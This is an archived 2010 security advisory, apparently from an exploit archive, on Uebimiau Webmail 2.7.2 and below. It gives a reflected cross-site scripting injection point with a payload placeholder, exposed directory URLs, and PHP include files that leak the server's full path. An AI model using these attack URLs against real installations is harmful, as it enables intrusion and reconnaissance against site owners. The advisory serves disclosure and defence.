Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure: Posted Mar 28, 2010; Authored by cp77fk4r; Uebimiau Webmail versions 2.7.2 and below suffer from cross site scripting and path disclosure vulnerabilities.; tags | exploit, vulnerability, xss, info disclosure; SHA-256 | f1b74e0447a08833ad7d3eab8a211bd6d7014e53dc4ae9c14bb2ca3e470e2f74; Download | Favorite | View

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

# Exploit Title: Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities.
# Date: 13/03/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
# Software Link: http://www.uebimiau.org/
# Version: <= 2.7.2
# Tested on: PHP
#
##[Cross Site Scripting]
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
#
http://[SERVER]/webmail/index.php?lid=en_US&tid=clean&f_user=&six=3&f_email=[YOUR_XSS_HERE]
#
#
##[Directory Listing:]
#
http://[SERVER]/webmail/inc
http://[SERVER]/webmail/images/
http://[SERVER]/webmail/extra/
http://[SERVER]/webmail/themes/
http://[SERVER]/webmail/smarty
#
##[Full Path Disclosure:]
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)
#
The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path:
#
http://[SERVER]/webmail/inc/class.uebimiau.php
http://[SERVER]/webmail/inc/class.uebimiau_mail.php
http://[SERVER]/webmail/inc/config.php
http://[SERVER]/webmail/inc/inc.php
http://[SERVER]/webmail/smarty/Smarty_Compiler.class.php
http://[SERVER]/webmail/smarty/plugins/function.html_select_date.php
http://[SERVER]/webmail/smarty/plugins/function.html_select_time.php
http://[SERVER]/webmail/smarty/plugins/modifier.date_format.php
#
#
[e0f]

Top Authors In Last 30 Days

Red Hat 230 files
Ubuntu 89 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

Share This

Uebimiau Webmail 2.7.2 Cross Site Scripting / Path Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems